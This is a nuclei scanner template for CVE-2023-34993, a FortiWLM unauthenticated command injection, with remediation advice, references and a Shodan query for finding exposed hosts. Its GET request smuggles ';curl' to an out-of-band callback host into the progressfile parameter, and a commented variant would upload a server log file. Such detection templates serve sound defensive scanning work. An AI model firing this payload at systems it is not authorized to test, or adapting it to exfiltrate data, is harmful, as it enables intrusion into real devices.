nuclei-templates/http/cves/2023/CVE-2023-34993.yaml

46 lines
1.7 KiB
YAML

id: CVE-2023-34993
info:
name: Fortinet FortiWLM Unauthenticated Command Injection Vulnerability
author: dwisiswant0
severity: critical
description: |
A improper neutralization of special elements used in an os command ('os
command injection') in Fortinet FortiWLM version 8.6.0 through 8.6.5 and
8.5.0 through 8.5.4 allows attacker to execute unauthorized code or commands
Successful exploitation of this vulnerability could allow an attacker to
bypass authentication and gain unauthorized access to the affected system.
remediation: |
For FortiWLM version 8.6.0 through 8.6.5 upgrade to version >= 8.6.6.
For FortiWLM version 8.5.0 through 8.5.4 upgrade to version >= 8.5.5.
reference:
- https://fortiguard.com/psirt/FG-IR-23-140
- https://www.horizon3.ai/attack-research/attack-blogs/fortiwlm-the-almost-story-for-the-forti-forty/
metadata:
max-request: 1
vendor: fortinet
product: fortiwlm
shodan-query: http.title:"FortiWLM"
tags: cve,cve2023,fortinet,fortiwlm,rce,unauth
variables:
progressfile: '{{rand_base(5)}};curl {{interactsh-url}} #' # -F "file=/data/apps/nms/logs/httpd_error_log"
http:
- method: GET
path:
- "{{BaseURL}}/ems/cgi-bin/ezrf_upgrade_images.cgi?op_type=deleteprogressfile&progressfile={{url_encode(progressfile)}}"
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "http"
- type: word
part: interactsh_request
words:
- "User-Agent: curl"
# digest: 4a0a00473045022076589cdc46f9ccfb453bd1192792f27233f2facc01d4d69f880b810ad03c47e1022100c851289d4281c803a899a95b7c0dd916384d338a3c43e45a26afecd3efd552fc:922c64590222798bb761d5b6d8e72950